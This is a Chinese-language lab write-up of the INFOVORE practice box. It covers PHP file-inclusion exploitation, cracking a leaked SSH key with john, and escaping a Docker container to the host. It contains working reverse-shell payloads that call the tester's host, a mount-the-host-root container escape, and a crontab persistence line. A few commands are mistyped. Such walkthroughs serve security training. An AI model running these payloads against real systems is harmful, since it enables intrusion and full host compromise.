当前位置: 首页 > news >正文

Linux系统提权-web/普通用户-docker逃逸提权shell交互

Linux系统提权-web/普通用户-docker逃逸&提权&shell交互

docker提权分几种情况

1、权限在docker里面逃逸 提权(宿主机)
2、权限不在docker里面借助docker应用去提权(用户归属是docker组 拉镜像 提权)

参考链接https://github.com/cdk-team/CDK

docker逃逸+提权主要分下面几步

破解/etc/shadow
写到宿主机SSH密钥
写到宿主机计划任务
利用CVE漏洞直接利用反弹

INFOVORE lab实验

namp扫出目标机器

image-20250523223347550

nikto扫出可能有文件包含漏洞

image-20250523223714702

通过fuzz测试参数,找到包含路径

image-20250523223940710

漏洞利用源码:https://github.com/vulhub/vulhub/blob/master/php/inclusion/exp.py

运行exp

image-20250523225111047

文件包含/tmp/g反弹shell

http://192.168.161.145/index.php?filename=/tmp/g&1=system(%27bash%20-c%20%22exec%20bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.161.131%2f4444%200%3E%261%22%27);

image-20250523225243369

ls -la

发现有dockerenv,权限再docker里面

image-20250523225407385

提权

根目录下发现.oldkeys.tgz,复制到tmp目录下解压

cp .oldkeys.tgz /tmp/oldkeys.tgz
tar -zxvf oldkeys.tgz

image-20250523230022265

得到root和root.pub两个文件

image-20250523230104165

使用john爆破root密码

image-20250523230130463

/usr/share/john/ssh2john.py key.txt >key.hash

image-20250523231948147

/usr/share/john/ssh2john.py key.hash --wordlist=/usr/share/wordlists/rockyou.txt

拿到密码

image-20250523233122922

目标机切换成root

image-20250523233239781

image-20250523233247977

有找到pty,要产生一个pty,我们可以使用两种方法,我使用su root -P

拿到第一个flag,但此时还在docker容器内

image-20250523233448129

试着docker逃逸,切到/root/.ssh目录发现有id_rsa.pub文件

image-20250523233624456

查看发现真机上有admin用户

image-20250523233940560

尝试使用id_rsa(私钥)获取对admin的访问权限

image-20250524093050177

再通过镜像挂载,把真机的docker里的/mnt目录挂载到真机的/目录上

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

报错了,拉不下来,应该是网络问题

image-20250524095008841

在kali上开个服务,拉个alpine镜像,靶机远程下载这个镜像再加载吧

docker pull alpine 
docker save alpine > alpine.tar

image-20250524095129786

wget http://192.168.161:8000

image-20250524095237811

docker < alpine.tar #把镜像加载进来

image-20250524095304817

再通过镜像挂载,把真机的docker里的/mnt目录挂载到真机的/目录上

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

image-20250524095754805

现在只是通过磁盘挂载可以访问到宿主机的目录,如何把宿主机的shell反弹出来?

写到宿主机计划任务反弹shell

echo -e "* * * * * root bash -i >& /dev/tcp/192.168.161.131/6666 0>&1\n" >> /etc/crontab
http://www.zskr.cn/news/12289.html

相关文章:

  • 暴力拓客游戏小程序:助力商家高效引流与裂变的智能解决方案
  • 第二类斯特林数
  • 扫码签到赢大奖小程序:助力多场景获客的智能营销工具
  • docker 镜像/容器
  • jmeter命令行参数详细解释
  • 神秘考试题
  • 华三交换机升级版本步骤
  • 企业级 AI 应用开发首选!JBoltAI 框架适配 Java 技术栈,稳定可靠
  • AIGS架构革命:JBoltAI如何重塑Java企业的AI服务生态
  • RAG技术赋能企业数智化转型:JBoltAI如何破解AI落地“最后一公里”难题
  • Java 团队转型 AI 开发难?JBoltAI 框架帮你节省 4-6 个月研发成本
  • IntelliJ IDEA 查找和替换使用指南 - 详解
  • 完整教程:探索 Event 框架实战指南:微服务系统中的事件驱动通信:
  • 全新升级~山海鲸4.5.12版本更新内容速递
  • Gitee DevOps:本土化工具链如何重塑中国技术团队的研发效能
  • 测试平台如何重塑CI/CD流程:从质量关卡到全流程协同的进化之路
  • TIA SIM 授权
  • DailyPaper-2025-9-26
  • qq
  • SimCC: a Simple Coordinate Classification Perspective for Human Pose Estimation
  • 10.1.1 启用python达成第一个遗传算法
  • Docker Docker Compose 完整入门与实用技巧 - 教程
  • PySide6 之鼠标事件写字板
  • 深入解析:golang基础语法(三)常量、指针、别名、关键字、运算符、字符串类型转换
  • 单B细胞技术如何实现兔单抗高通量高特异制备
  • 实用指南:Golang学习笔记: 常用标准库
  • 深入解析:Apache 生产环境操作与 LAMP 搭建指南
  • JAVA第一天
  • C# Avalonia 15- Animation- CustomEasingFunction
  • nginx平滑升级+location案例 - 教程